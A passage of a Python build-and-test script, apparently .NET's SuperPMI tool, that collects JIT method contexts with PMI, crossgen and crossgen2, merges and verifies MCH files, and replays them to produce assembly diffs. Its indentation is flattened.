################################################################################################ Do collection using PMI
if self.coreclr_args.pmi is True:
logging.debug("Starting collection using PMI")
async def run_pmi(print_prefix, assembly, self):
""" Run pmi over all dlls
"""
command = [self.corerun, self.pmi_location, "DRIVEALL", assembly]
command_string = " ".join(command)
logging.debug("%s%s", print_prefix, command_string)
# Save the stdout and stderr to files, so we can see if PMI wrote any interesting messages.
# Use the name of the assembly as the basename of the file. mkstemp() will ensure the file
# is unique.
root_output_filename = make_safe_filename("pmi_" + assembly + "_")
try:
stdout_file_handle, stdout_filepath = tempfile.mkstemp(suffix=".stdout", prefix=root_output_filename, dir=self.temp_location)
stderr_file_handle, stderr_filepath = tempfile.mkstemp(suffix=".stderr", prefix=root_output_filename, dir=self.temp_location)
proc = await asyncio.create_subprocess_shell(
command_string,
stdout=stdout_file_handle,
stderr=stderr_file_handle)
await proc.communicate()
os.close(stdout_file_handle)
os.close(stderr_file_handle)
# No need to keep zero-length files
if is_zero_length_file(stdout_filepath):
os.remove(stdout_filepath)
if is_zero_length_file(stderr_filepath):
os.remove(stderr_filepath)
return_code = proc.returncode
if return_code != 0:
logging.debug("'%s': Error return code: %s", command_string, return_code)
write_file_to_log(stdout_filepath, log_level=logging.DEBUG)
write_file_to_log(stderr_filepath, log_level=logging.DEBUG)
except OSError as ose:
if "[WinError 32] The process cannot access the file because it is being used by another " \
"process:" in format(ose):
logging.warning("Skipping file %s. Got error: %s".format(root_output_filename, format(ose)))
else:
raise ose
# Set environment variables.
pmi_command_env = env_copy.copy()
pmi_complus_env = complus_env.copy()
pmi_complus_env["JitName"] = self.collection_shim_name
set_and_report_env(pmi_command_env, root_env, pmi_complus_env)
old_env = os.environ.copy()
os.environ.update(pmi_command_env)
helper = AsyncSubprocessHelper(assemblies, verbose=True)
helper.run_to_completion(run_pmi, self)
# Review: does this delete the items that weren't there before we updated with the PMI variables?
os.environ.update(old_env)
################################################################################################ end of "self.coreclr_args.pmi is True"
################################################################################################ Do collection using crossgen
if self.coreclr_args.crossgen is True:
logging.debug("Starting collection using crossgen")
async def run_crossgen(print_prefix, assembly, self):
""" Run crossgen over all dlls
"""
root_crossgen_output_filename = make_safe_filename("crossgen_" + assembly) + ".out.dll"
crossgen_output_assembly_filename = os.path.join(self.temp_location, root_crossgen_output_filename)
try:
if os.path.exists(crossgen_output_assembly_filename):
os.remove(crossgen_output_assembly_filename)
except OSError as ose:
if "[WinError 32] The process cannot access the file because it is being used by another " \
"process:" in format(ose):
logging.warning("Skipping file %s. Got error: %s".format(crossgen_output_assembly_filename, format(ose)))
return
else:
raise ose
command = [self.crossgen_tool, "/Platform_Assemblies_Paths", self.core_root, "/in", assembly, "/out", crossgen_output_assembly_filename]
command_string = " ".join(command)
logging.debug("%s%s", print_prefix, command_string)
# Save the stdout and stderr to files, so we can see if crossgen wrote any interesting messages.
# Use the name of the assembly as the basename of the file. mkstemp() will ensure the file
# is unique.
root_output_filename = make_safe_filename("crossgen_" + assembly + "_")
try:
stdout_file_handle, stdout_filepath = tempfile.mkstemp(suffix=".stdout", prefix=root_output_filename, dir=self.temp_location)
stderr_file_handle, stderr_filepath = tempfile.mkstemp(suffix=".stderr", prefix=root_output_filename, dir=self.temp_location)
proc = await asyncio.create_subprocess_shell(
command_string,
stdout=stdout_file_handle,
stderr=stderr_file_handle)
await proc.communicate()
os.close(stdout_file_handle)
os.close(stderr_file_handle)
# No need to keep zero-length files
if is_zero_length_file(stdout_filepath):
os.remove(stdout_filepath)
if is_zero_length_file(stderr_filepath):
os.remove(stderr_filepath)
return_code = proc.returncode
if return_code != 0:
logging.debug("'%s': Error return code: %s", command_string, return_code)
write_file_to_log(stdout_filepath, log_level=logging.DEBUG)
write_file_to_log(stderr_filepath, log_level=logging.DEBUG)
except OSError as ose:
if "[WinError 32] The process cannot access the file because it is being used by another " \
"process:" in format(ose):
logging.warning("Skipping file %s. Got error: %s".format(root_output_filename, format(ose)))
else:
raise ose
# Set environment variables.
crossgen_command_env = env_copy.copy()
crossgen_complus_env = complus_env.copy()
crossgen_complus_env["JitName"] = self.collection_shim_name
set_and_report_env(crossgen_command_env, root_env, crossgen_complus_env)
old_env = os.environ.copy()
os.environ.update(crossgen_command_env)
helper = AsyncSubprocessHelper(assemblies, verbose=True)
helper.run_to_completion(run_crossgen, self)
# Review: does this delete the items that weren't there before we updated with the crossgen variables?
os.environ.update(old_env)
################################################################################################ end of "self.coreclr_args.crossgen is True"
################################################################################################ Do collection using crossgen2
if self.coreclr_args.crossgen2 is True:
logging.debug("Starting collection using crossgen2")
async def run_crossgen2(print_prefix, assembly, self):
""" Run crossgen2 over all dlls
"""
root_crossgen2_output_filename = make_safe_filename("crossgen2_" + assembly) + ".out.dll"
crossgen2_output_assembly_filename = os.path.join(self.temp_location, root_crossgen2_output_filename)
try:
if os.path.exists(crossgen2_output_assembly_filename):
os.remove(crossgen2_output_assembly_filename)
except OSError as ose:
if "[WinError 32] The process cannot access the file because it is being used by another " \
"process:" in format(ose):
logging.warning("Skipping file %s. Got error: %s".format(crossgen2_output_assembly_filename, format(ose)))
return
else:
raise ose
root_output_filename = make_safe_filename("crossgen2_" + assembly + "_")
# Create a temporary response file to put all the arguments to crossgen2 (otherwise the path length limit could be exceeded):
#
# <dll to compile>
# -o:<output dll>
# -r:<Core_Root>\System.*.dll
# -r:<Core_Root>\Microsoft.*.dll
# -r:<Core_Root>\mscorlib.dll
# -r:<Core_Root>\netstandard.dll
# --jitpath:<self.collection_shim_name>
# --codegenopt:<option>=<value> /// for each member of complus_env
#
# invoke with:
#
# dotnet <Core_Root>\crossgen2\crossgen2.dll @<temp.rsp>
#
# where "dotnet" is one of:
# 1. <runtime_root>\dotnet.cmd/sh
# 2. "dotnet" on PATH
# 3. corerun in Core_Root
rsp_file_handle, rsp_filepath = tempfile.mkstemp(suffix=".rsp", prefix=root_output_filename, dir=self.temp_location)
with open(rsp_file_handle, "w") as rsp_write_handle:
rsp_write_handle.write(assembly + "\n")
rsp_write_handle.write("-o:" + crossgen2_output_assembly_filename + "\n")
rsp_write_handle.write("-r:" + os.path.join(self.core_root, "System.*.dll") + "\n")
rsp_write_handle.write("-r:" + os.path.join(self.core_root, "Microsoft.*.dll") + "\n")
rsp_write_handle.write("-r:" + os.path.join(self.core_root, "mscorlib.dll") + "\n")
rsp_write_handle.write("-r:" + os.path.join(self.core_root, "netstandard.dll") + "\n")
rsp_write_handle.write("--parallelism:1" + "\n")
rsp_write_handle.write("--jitpath:" + os.path.join(self.core_root, self.collection_shim_name) + "\n")
for var, value in complus_env.items():
rsp_write_handle.write("--codegenopt:" + var + "=" + value + "\n")
# Log what is in the response file
write_file_to_log(rsp_filepath)
command = [self.crossgen2_driver_tool, self.coreclr_args.crossgen2_tool_path, "@" + rsp_filepath]
command_string = " ".join(command)
logging.debug("%s%s", print_prefix, command_string)
# Save the stdout and stderr to files, so we can see if crossgen2 wrote any interesting messages.
# Use the name of the assembly as the basename of the file. mkstemp() will ensure the file
# is unique.
try:
stdout_file_handle, stdout_filepath = tempfile.mkstemp(suffix=".stdout", prefix=root_output_filename, dir=self.temp_location)
stderr_file_handle, stderr_filepath = tempfile.mkstemp(suffix=".stderr", prefix=root_output_filename, dir=self.temp_location)
proc = await asyncio.create_subprocess_shell(
command_string,
stdout=stdout_file_handle,
stderr=stderr_file_handle)
await proc.communicate()
os.close(stdout_file_handle)
os.close(stderr_file_handle)
# No need to keep zero-length files
if is_zero_length_file(stdout_filepath):
os.remove(stdout_filepath)
if is_zero_length_file(stderr_filepath):
os.remove(stderr_filepath)
return_code = proc.returncode
if return_code != 0:
logging.debug("'%s': Error return code: %s", command_string, return_code)
write_file_to_log(stdout_filepath, log_level=logging.DEBUG)
write_file_to_log(stderr_filepath, log_level=logging.DEBUG)
except OSError as ose:
if "[WinError 32] The process cannot access the file because it is being used by another " \
"process:" in format(ose):
logging.warning("Skipping file %s. Got error: %s".format(root_output_filename, format(ose)))
else:
raise ose
# Delete the response file unless we are skipping cleanup
if not self.coreclr_args.skip_cleanup:
os.remove(rsp_filepath)
# Set environment variables.
crossgen2_command_env = env_copy.copy()
set_and_report_env(crossgen2_command_env, root_env)
old_env = os.environ.copy()
os.environ.update(crossgen2_command_env)
# Note: crossgen2 compiles in parallel by default. However, it seems to lead to sharing violations
# in SuperPMI collection, accessing the MC file. So, disable crossgen2 parallism by using
# the "--parallelism:1" switch, and allowing coarse-grained (per-assembly) parallelism here.
# It turns out this works better anyway, as there is a lot of non-parallel time between
# crossgen2 parallel compilations.
helper = AsyncSubprocessHelper(assemblies, verbose=True)
helper.run_to_completion(run_crossgen2, self)
# Review: does this delete the items that weren't there before we updated with the crossgen2 variables?
os.environ.update(old_env)
################################################################################################ end of "self.coreclr_args.crossgen2 is True"
mc_files = [os.path.join(self.temp_location, item) for item in os.listdir(self.temp_location) if item.endswith(".mc")]
if len(mc_files) == 0:
raise RuntimeError("No .mc files generated.")
def __merge_mc_files__(self):
""" Merge the mc files that were generated
Notes:
mcs -merge <s_baseMchFile> <s_tempDir>\\*.mc -recursive -dedup -thin
"""
logging.info("Merging MC files")
pattern = os.path.join(self.temp_location, "*.mc")
command = [self.mcs_path, "-merge", self.base_mch_file, pattern, "-recursive", "-dedup", "-thin"]
run_and_log(command)
if not os.path.isfile(self.base_mch_file):
raise RuntimeError("MCH file failed to be generated at: %s" % self.base_mch_file)
# All the individual MC files are no longer necessary, now that we have
# merged them into the base.mch. Delete them.
if not self.coreclr_args.skip_cleanup:
mc_files = [os.path.join(self.temp_location, item) for item in os.listdir(self.temp_location) if item.endswith(".mc")]
for item in mc_files:
os.remove(item)
def __merge_mch_files__(self):
""" Merge MCH files in the mch_files list. This is only used with the `--merge_mch_files` argument.
Notes:
mcs -concat <s_baseMchFile> [self.coreclr_args.mch_files]
"""
logging.info("Merging MCH files")
for item in self.coreclr_args.mch_files:
command = [self.mcs_path, "-concat", self.base_mch_file, item]
run_and_log(command)
if not os.path.isfile(self.base_mch_file):
raise RuntimeError("MCH file failed to be generated at: %s" % self.base_mch_file)
def __create_clean_mch_file__(self):
""" Create a clean mch file
Notes:
<SuperPMIPath> -p -f <s_baseFailMclFile> <s_baseMchFile> <jitPath>
if <s_baseFailMclFile> is non-empty:
<mcl> -strip <s_baseFailMclFile> <s_baseMchFile> <s_finalMchFile>
else
# copy/move base file to final file
del <s_baseFailMclFile>
"""
logging.info("Cleaning MCH file")
command = [self.superpmi_path, "-p", "-f", self.base_fail_mcl_file, self.base_mch_file, self.jit_path]
run_and_log(command)
if is_nonzero_length_file(self.base_fail_mcl_file):
command = [self.mcs_path, "-strip", self.base_fail_mcl_file, self.base_mch_file, self.final_mch_file]
run_and_log(command)
else:
# Ideally we could just rename this file instead of copying it.
shutil.copy2(self.base_mch_file, self.final_mch_file)
if not os.path.isfile(self.final_mch_file):
raise RuntimeError("Final mch file failed to be generated.")
if not self.coreclr_args.skip_cleanup:
if os.path.isfile(self.base_fail_mcl_file):
os.remove(self.base_fail_mcl_file)
self.base_fail_mcl_file = None
if os.path.isfile(self.base_mch_file):
os.remove(self.base_mch_file)
self.base_mch_file = None
def __create_toc__(self):
""" Create a TOC file
Notes:
<mcl> -toc <s_finalMchFile>
"""
logging.info("Creating TOC file")
command = [self.mcs_path, "-toc", self.final_mch_file]
run_and_log(command)
if not os.path.isfile(self.toc_file):
raise RuntimeError("Error, toc file not created correctly at: %s" % self.toc_file)
def __verify_final_mch__(self):
""" Verify the resulting MCH file is error-free when running SuperPMI against it with the same JIT used for collection.
Notes:
<SuperPmiPath> -p -f <s_finalFailMclFile> <s_finalMchFile> <jitPath>
"""
logging.info("Verifying MCH file")
mch_files = [ self.final_mch_file ]
spmi_replay = SuperPMIReplay(self.coreclr_args, mch_files, self.jit_path)
passed = spmi_replay.replay()
if not passed:
raise RuntimeError("Error, unclean replay.")
################################################################################
# SuperPMI Replay helpers
################################################################################
def print_superpmi_failure_code(return_code, coreclr_args):
""" Print a description of a superpmi return (error) code. If the return code is
zero, meaning success, don't print anything.
Note that Python treats process return codes (at least on Windows) as
unsigned integers, so compare against both signed and unsigned numbers for
those return codes.
"""
if return_code == 0:
# Don't print anything if the code is zero, which is success.
pass
elif return_code == -1 or return_code == 4294967295:
logging.error("General fatal error")
elif return_code == -2 or return_code == 4294967294:
logging.error("JIT failed to initialize")
elif return_code == 1:
logging.warning("Compilation failures")
elif return_code == 2:
logging.warning("Asm diffs found")
elif return_code == 3:
logging.warning("SuperPMI missing data encountered")
elif return_code == 139 and coreclr_args.host_os != "windows":
logging.error("Fatal error, SuperPMI has returned SIGSEGV (segmentation fault)")
else:
logging.error("Unknown error code %s", return_code)
def print_fail_mcl_file_method_numbers(fail_mcl_file):
""" Given a SuperPMI ".mcl" file (containing a list of failure indices), print out the method numbers.
"""
with open(fail_mcl_file) as file_handle:
mcl_lines = file_handle.readlines()
mcl_lines = [item.strip() for item in mcl_lines]
logging.debug("Method numbers with compilation failures:")
for line in mcl_lines:
logging.debug(line)
def save_repro_mc_files(temp_location, coreclr_args, repro_base_command_line):
""" For commands that use the superpmi "-r" option to create "repro" .mc files, copy these to a
location where they are saved (and not in a "temp" directory) for easy use by the user.
"""
# If there are any .mc files, drop them into artifacts/repro/<host_os>.<arch>.<build_type>/*.mc
mc_files = [os.path.join(temp_location, item) for item in os.listdir(temp_location) if item.endswith(".mc")]
if len(mc_files) > 0:
repro_location = create_unique_directory_name(coreclr_args.spmi_location, "repro.{}.{}.{}".format(coreclr_args.host_os, coreclr_args.arch, coreclr_args.build_type))
repro_files = []
for item in mc_files:
repro_files.append(os.path.join(repro_location, os.path.basename(item)))
logging.debug("Copying %s -> %s", item, repro_location)
shutil.copy2(item, repro_location)
logging.info("")
logging.info("Repro .mc files created for failures:")
for item in repro_files:
logging.info(item)
logging.info("")
logging.info("To run a specific failure (replace JIT path and .mc filename as needed):")
logging.info("")
logging.info("%s %s%sxxxxx.mc", repro_base_command_line, repro_location, os.path.sep)
logging.info("")
################################################################################
# SuperPMI Replay
################################################################################
class SuperPMIReplay:
""" SuperPMI Replay class
Notes:
The object is responsible for replaying the MCH files given to the
instance of the class
"""
def __init__(self, coreclr_args, mch_files, jit_path):
""" Constructor
Args:
coreclr_args (CoreclrArguments) : parsed args
mch_files (list) : list of MCH files to replay
jit_path (str) : path to clrjit
"""
self.jit_path = jit_path
self.mch_files = mch_files
self.superpmi_path = determine_superpmi_tool_path(coreclr_args)
self.coreclr_args = coreclr_args
############################################################################
# Instance Methods
############################################################################
def replay(self):
""" Replay the given SuperPMI collection
Returns:
(bool) True on success; False otherwise
"""
result = True # Assume success
# Possible return codes from SuperPMI
#
# 0 : success
# -1 : general fatal error (e.g., failed to initialize, failed to read files)
# -2 : JIT failed to initialize
# 1 : there were compilation failures
# 2 : there were assembly diffs
with TempDir() as temp_location:
logging.debug("")
logging.debug("Temp Location: %s", temp_location)
logging.debug("")
# `repro_flags` are the subset of flags we tell the user to pass to superpmi when reproducing
# a failure. This won't include things like "-p" for parallelism or "-r" to create a repro .mc file.
repro_flags = []
common_flags = [
"-v", "ew", # only display errors and warnings
"-r", os.path.join(temp_location, "repro") # Repro name, create .mc repro files
]
if self.coreclr_args.altjit:
repro_flags += [
"-jitoption", "force", "AltJit=*",
"-jitoption", "force", "AltJitNgen=*"
]
if self.coreclr_args.arch != self.coreclr_args.target_arch:
repro_flags += [ "-target", self.coreclr_args.target_arch ]
if not self.coreclr_args.sequential:
common_flags += [ "-p" ]
if self.coreclr_args.break_on_assert:
common_flags += [ "-boa" ]
if self.coreclr_args.break_on_error:
common_flags += [ "-boe" ]
if self.coreclr_args.spmi_log_file is not None:
common_flags += [ "-w", self.coreclr_args.spmi_log_file ]
common_flags += repro_flags
# For each MCH file that we are going to replay, do the replay and replay post-processing.
#
# Consider: currently, we loop over all the steps for each MCH file, including (1) invoke
# SuperPMI, (2) process results. It might be better to do (1) for each MCH file, then
# process all the results at once. Currently, the results for some processing can be
# obscured by the normal run output for subsequent MCH files.
# Keep track of any MCH file replay failures
files_with_replay_failures = []
for mch_file in self.mch_files:
logging.info("Running SuperPMI replay of %s", mch_file)
flags = common_flags
fail_mcl_file = os.path.join(temp_location, os.path.basename(mch_file) + "_fail.mcl")
flags += [
"-f", fail_mcl_file, # Failing mc List
]
command = [self.superpmi_path] + flags + [self.jit_path, mch_file]
return_code = run_and_log(command)
print_superpmi_failure_code(return_code, self.coreclr_args)
if return_code == 0:
logging.info("Clean SuperPMI replay")
else:
files_with_replay_failures.append(mch_file)
result = False
if is_nonzero_length_file(fail_mcl_file):
# Unclean replay. Examine the contents of the fail.mcl file to dig into failures.
if return_code == 0:
logging.warning("Warning: SuperPMI returned a zero exit code, but generated a non-zero-sized mcl file")
print_fail_mcl_file_method_numbers(fail_mcl_file)
repro_base_command_line = "{} {} {}".format(self.superpmi_path, " ".join(repro_flags), self.jit_path)
save_repro_mc_files(temp_location, self.coreclr_args, repro_base_command_line)
if not self.coreclr_args.skip_cleanup:
if os.path.isfile(fail_mcl_file):
os.remove(fail_mcl_file)
fail_mcl_file = None
################################################################################################ end of for mch_file in self.mch_files
logging.info("Replay summary:")
if len(files_with_replay_failures) == 0:
logging.info(" All replays clean")
else:
logging.info(" Replay failures in %s MCH files:", len(files_with_replay_failures))
for file in files_with_replay_failures:
logging.info(" %s", file)
return result
################################################################################
# SuperPMI Replay/AsmDiffs
################################################################################
class SuperPMIReplayAsmDiffs:
""" SuperPMI Replay AsmDiffs class
Notes:
The object is responsible for replaying the mch file given to the
instance of the class and doing diffs using the two passed jits.
"""
def __init__(self, coreclr_args, mch_files, base_jit_path, diff_jit_path):
""" Constructor
Args:
coreclr_args (CoreclrArguments) : parsed args
mch_files (list) : list of MCH files to replay
base_jit_path (str) : path to baseline clrjit
diff_jit_path (str) : path to diff clrjit
"""
self.base_jit_path = base_jit_path
self.diff_jit_path = diff_jit_path
self.mch_files = mch_files
self.superpmi_path = determine_superpmi_tool_path(coreclr_args)
self.coreclr_args = coreclr_args
self.diff_mcl_contents = None
############################################################################
# Instance Methods
############################################################################
def replay_with_asm_diffs(self):
""" Replay the given SuperPMI collection, generating asm diffs
Returns:
(bool) True on success; False otherwise
"""
result = True # Assume success
# Possible return codes from SuperPMI
#
# 0 : success
# -1 : general fatal error (e.g., failed to initialize, failed to read files)
# -2 : JIT failed to initialize
# 1 : there were compilation failures
# 2 : there were assembly diffs
# Set up some settings we'll use below.
asm_complus_vars = {
"COMPlus_JitDisasm": "*",
"COMPlus_JitUnwindDump": "*",
"COMPlus_JitEHDump": "*",
"COMPlus_NgenDisasm": "*",
"COMPlus_NgenUnwindDump": "*",
"COMPlus_NgenEHDump": "*",
"COMPlus_JitDiffableDasm": "1",
"COMPlus_JitEnableNoWayAssert": "1",
"COMPlus_JitNoForceFallback": "1",
"COMPlus_JitRequired": "1",
"COMPlus_JitDisasmWithGC": "1",
"COMPlus_TieredCompilation": "0" }
if self.coreclr_args.gcinfo:
asm_complus_vars.update({
"COMPlus_JitGCDump": "*",
"COMPlus_NgenGCDump": "*" })
jit_dump_complus_vars = asm_complus_vars.copy()
jit_dump_complus_vars.update({
"COMPlus_JitDump": "*",
"COMPlus_NgenDump": "*" })
target_flags = []
if self.coreclr_args.arch != self.coreclr_args.target_arch:
target_flags += [ "-target", self.coreclr_args.target_arch ]
altjit_asm_diffs_flags = target_flags
altjit_replay_flags = target_flags
if self.coreclr_args.altjit:
altjit_asm_diffs_flags += [
"-jitoption", "force", "AltJit=*",
"-jitoption", "force", "AltJitNgen=*",
"-jit2option", "force", "AltJit=*",
"-jit2option", "force", "AltJitNgen=*"
]
altjit_replay_flags += [
"-jitoption", "force", "AltJit=*",
"-jitoption", "force", "AltJitNgen=*"
]
# Keep track if any MCH file replay had asm diffs
files_with_asm_diffs = []
files_with_replay_failures = []
with TempDir(self.coreclr_args.temp_dir, self.coreclr_args.skip_cleanup) as temp_location:
logging.debug("")
logging.debug("Temp Location: %s", temp_location)
logging.debug("")
# For each MCH file that we are going to replay, do the replay and replay post-processing.
#
# Consider: currently, we loop over all the steps for each MCH file, including (1) invoke
# SuperPMI, (2) process results. It might be better to do (1) for each MCH file, then
# process all the results at once. Currently, the results for some processing can be
# obscured by the normal run output for subsequent MCH files.
for mch_file in self.mch_files:
logging.info("Running asm diffs of %s", mch_file)
fail_mcl_file = os.path.join(temp_location, os.path.basename(mch_file) + "_fail.mcl")
diff_mcl_file = os.path.join(temp_location, os.path.basename(mch_file) + "_diff.mcl")
# If the user passed -temp_dir, we skip the SuperPMI replay process,
# and rely on what we find from a previous run.
if self.coreclr_args.temp_dir is not None:
return_code = 1
else:
flags = [
"-a", # Asm diffs
"-v", "ew", # only display errors and warnings
"-f", fail_mcl_file, # Failing mc List
"-diffMCList", diff_mcl_file, # Create all of the diffs in an mcl file
"-r", os.path.join(temp_location, "repro") # Repro name, create .mc repro files
]
flags += altjit_asm_diffs_flags
if not self.coreclr_args.sequential:
flags += [ "-p" ]
if self.coreclr_args.break_on_assert:
flags += [ "-boa" ]
if self.coreclr_args.break_on_error:
flags += [ "-boe" ]
if self.coreclr_args.spmi_log_file is not None:
flags += [ "-w", self.coreclr_args.spmi_log_file ]
# Change the working directory to the Core_Root we will call SuperPMI from.
# This is done to allow libcoredistools to be loaded correctly on unix
# as the loadlibrary path will be relative to the current directory.
with ChangeDir(self.coreclr_args.core_root):
command = [self.superpmi_path] + flags + [self.base_jit_path, self.diff_jit_path, mch_file]
return_code = run_and_log(command)
print_superpmi_failure_code(return_code, self.coreclr_args)
if return_code == 0:
logging.info("Clean SuperPMI replay")
else:
files_with_replay_failures.append(mch_file)
result = False
if is_nonzero_length_file(fail_mcl_file):
# Unclean replay. Examine the contents of the fail.mcl file to dig into failures.
if return_code == 0:
logging.warning("Warning: SuperPMI returned a zero exit code, but generated a non-zero-sized mcl file")
print_fail_mcl_file_method_numbers(fail_mcl_file)
repro_base_command_line = "{} {} {}".format(self.superpmi_path, " ".join(altjit_asm_diffs_flags), self.diff_jit_path)
save_repro_mc_files(temp_location, self.coreclr_args, repro_base_command_line)
# There were diffs. Go through each method that created diffs and
# create a base/diff asm file with diffable asm. In addition, create
# a standalone .mc for easy iteration.
if is_nonzero_length_file(diff_mcl_file):
# AsmDiffs. Save the contents of the fail.mcl file to dig into failures.
if return_code == 0:
logging.warning("Warning: SuperPMI returned a zero exit code, but generated a non-zero-sized mcl file")
# This file had asm diffs; keep track of that.
files_with_asm_diffs.append(mch_file)
self.diff_mcl_contents = None
with open(diff_mcl_file) as file_handle:
mcl_lines = file_handle.readlines()
mcl_lines = [item.strip() for item in mcl_lines]
self.diff_mcl_contents = mcl_lines
asm_root_dir = create_unique_directory_name(self.coreclr_args.spmi_location, "asm.{}.{}.{}".format(self.coreclr_args.host_os, self.coreclr_args.arch, self.coreclr_args.build_type))
base_asm_location = os.path.join(asm_root_dir, "base")
diff_asm_location = os.path.join(asm_root_dir, "diff")
os.makedirs(base_asm_location)
os.makedirs(diff_asm_location)
if self.coreclr_args.diff_jit_dump:
# If JIT dumps are requested, create a diff and baseline directory for JIT dumps
jitdump_root_dir = create_unique_directory_name(self.coreclr_args.spmi_location, "jitdump.{}.{}.{}".format(self.coreclr_args.host_os, self.coreclr_args.arch, self.coreclr_args.build_type))
base_dump_location = os.path.join(jitdump_root_dir, "base")
diff_dump_location = os.path.join(jitdump_root_dir, "diff")
os.makedirs(base_dump_location)
os.makedirs(diff_dump_location)
text_differences = queue.Queue()
jit_dump_differences = queue.Queue()
async def create_replay_artifacts(print_prefix, item, self, mch_file, env_vars, jit_differences_queue, base_location, diff_location, extension):
""" Run superpmi over an MC to create JIT asm or JIT dumps for the method.
"""
# Setup flags to call SuperPMI for both the diff jit and the base jit
flags = [
"-c", item,
"-v", "q" # only log from the jit.
]
flags += altjit_replay_flags
# Add in all the COMPlus variables we need
os.environ.update(env_vars)
# Change the working directory to the core root we will call SuperPMI from.
# This is done to allow libcoredistools to be loaded correctly on unix
# as the LoadLibrary path will be relative to the current directory.
with ChangeDir(self.coreclr_args.core_root):
async def create_one_artifact(jit_path: str, location: str) -> str:
command = [self.superpmi_path] + flags + [jit_path, mch_file]
item_path = os.path.join(location, "{}{}".format(item, extension))
with open(item_path, 'w') as file_handle:
logging.debug("%sGenerating %s", print_prefix, item_path)
logging.debug("%sInvoking: %s", print_prefix, " ".join(command))
proc = await asyncio.create_subprocess_shell(" ".join(command), stdout=file_handle, stderr=asyncio.subprocess.PIPE)
await proc.communicate()
with open(item_path, 'r') as file_handle:
generated_txt = file_handle.read()
return generated_txt
# Generate diff and base JIT dumps
base_txt = await create_one_artifact(self.base_jit_path, base_location)
diff_txt = await create_one_artifact(self.diff_jit_path, diff_location)
if base_txt != diff_txt:
jit_differences_queue.put_nowait(item)
################################################################################################ end of create_replay_artifacts()
diff_items = []
for item in self.diff_mcl_contents:
diff_items.append(item)
logging.info("Creating dasm files")
subproc_helper = AsyncSubprocessHelper(diff_items, verbose=True)
subproc_helper.run_to_completion(create_replay_artifacts, self, mch_file, asm_complus_vars, text_differences, base_asm_location, diff_asm_location, ".dasm")
if self.coreclr_args.diff_jit_dump:
logging.info("Creating JitDump files")
subproc_helper.run_to_completion(create_replay_artifacts, self, mch_file, jit_dump_complus_vars, jit_dump_differences, base_dump_location, diff_dump_location, ".txt")
logging.info("Differences found. To replay SuperPMI use:")
logging.info("")
for var, value in asm_complus_vars.items():
print_platform_specific_environment_vars(logging.INFO, self.coreclr_args, var, value)
logging.info("%s %s -c ### %s %s", self.superpmi_path, " ".join(altjit_replay_flags), self.diff_jit_path, mch_file)
logging.info("")
if self.coreclr_args.diff_jit_dump:
logging.info("To generate JitDump with SuperPMI use:")
logging.info("")
for var, value in jit_dump_complus_vars.items():
print_platform_specific_environment_vars(logging.INFO, self.coreclr_args, var, value)
logging.info("%s %s -c ### %s %s", self.superpmi_path, " ".join(altjit_replay_flags), self.diff_jit_path, mch_file)
logging.info("")
logging.debug("Method numbers with binary differences:")
for item in self.diff_mcl_contents:
logging.debug(item)
logging.debug("")
try:
current_text_diff = text_differences.get_nowait()
except:
current_text_diff = None
logging.info("Generated asm is located under %s %s", base_asm_location, diff_asm_location)
if current_text_diff is not None:
logging.info("Textual differences found in generated asm.")
# Find jit-analyze.bat/sh on PATH, if it exists, then invoke it.
ran_jit_analyze = False
path_var = os.environ.get("PATH")
if path_var is not None:
jit_analyze_file = "jit-analyze.bat" if platform.system() == "Windows" else "jit-analyze.sh"
jit_analyze_path = find_file(jit_analyze_file, path_var.split(os.pathsep))
if jit_analyze_path is not None:
# It appears we have a built jit-analyze on the path, so try to run it.
command = [ jit_analyze_path, "-r", "--base", base_asm_location, "--diff", diff_asm_location ]
run_and_log(command, logging.INFO)
ran_jit_analyze = True
if not ran_jit_analyze:
logging.info("jit-analyze not found on PATH. Generate a diff analysis report by building jit-analyze from https://github.com/dotnet/jitutils and running:")
logging.info(" jit-analyze -r --base %s --diff %s", base_asm_location, diff_asm_location)
else:
logging.warning("No textual differences. Is this an issue with coredistools?")
if self.coreclr_args.diff_jit_dump:
try:
current_jit_dump_diff = jit_dump_differences.get_nowait()
except:
current_jit_dump_diff = None
logging.info("Generated JitDump is located under %s %s", base_dump_location, diff_dump_location)
if current_jit_dump_diff is not None:
logging.info("Textual differences found in generated JitDump.")
else:
logging.warning("No textual differences found in generated JitDump. Is this an issue with coredistools?")
################################################################################################ end of processing asm diffs (if is_nonzero_length_file(diff_mcl_file)...
if not self.coreclr_args.skip_cleanup:
if os.path.isfile(fail_mcl_file):
os.remove(fail_mcl_file)
fail_mcl_file = None
################################################################################################ end of for mch_file in self.mch_files
logging.info("Asm diffs summary:")
if len(files_with_replay_failures) != 0:
logging.info(" Replay failures in %s MCH files:", len(files_with_replay_failures))
for file in files_with_replay_failures:
logging.info(" %s", file)
if len(files_with_asm_diffs) == 0:
logging.info(" No asm diffs")
else:
logging.info(" Asm diffs in %s MCH files:", len(files_with_asm_diffs))
for file in files_with_asm_diffs:
logging.info(" %s", file)
return result
################################################################################################ end of replay_with_asm_diffs()
################################################################################
# Argument handling helpers
################################################################################
def determine_coredis_tools(coreclr_args):
""" Determine the coredistools location. First, look in Core_Root. It will be there if
the setup-stress-dependencies.cmd/sh script has been run, which is typically only
if tests have been run. If unable to find coredistools, download it from a cached
copy in the CLRJIT Azure Storage. (Ideally, we would instead download the NuGet
package and extract it using the same mechanism as setup-stress-dependencies
instead of having our own copy in Azure Storage).
Args:
coreclr_args (CoreclrArguments) : parsed args
Returns:
coredistools_location (str) : path of [lib]coredistools.dylib|so|dll
"""
if not hasattr(coreclr_args, "core_root") or coreclr_args.core_root is None:
raise RuntimeError("Core_Root not set properly")
coredistools_dll_name = None
if coreclr_args.host_os.lower() == "osx":
coredistools_dll_name = "libcoredistools.dylib"
elif coreclr_args.host_os.lower() == "linux":
coredistools_dll_name = "libcoredistools.so"
elif coreclr_args.host_os.lower() == "windows":
coredistools_dll_name = "coredistools.dll"
else:
raise RuntimeError("Unknown host os: {}".format(coreclr_args.host_os))
coredistools_location = os.path.join(coreclr_args.core_root, coredistools_dll_name)
if os.path.isfile(coredistools_location):
logging.info("Using coredistools found at %s", coredistools_location)
else:
# Often, Core_Root will already exist. However, you can do a product build without
# creating a Core_Root, and successfully run replay or asm diffs, if we just create Core_Root
# and copy coredistools there. Note that our replays all depend on Core_Root existing, as we
# set the current directory to Core_Root before running superpmi.
if not os.path.isdir(coreclr_args.core_root):
logging.warning("Warning: Core_Root does not exist at \"%s\"; creating it now", coreclr_args.core_root)
os.makedirs(coreclr_args.core_root)
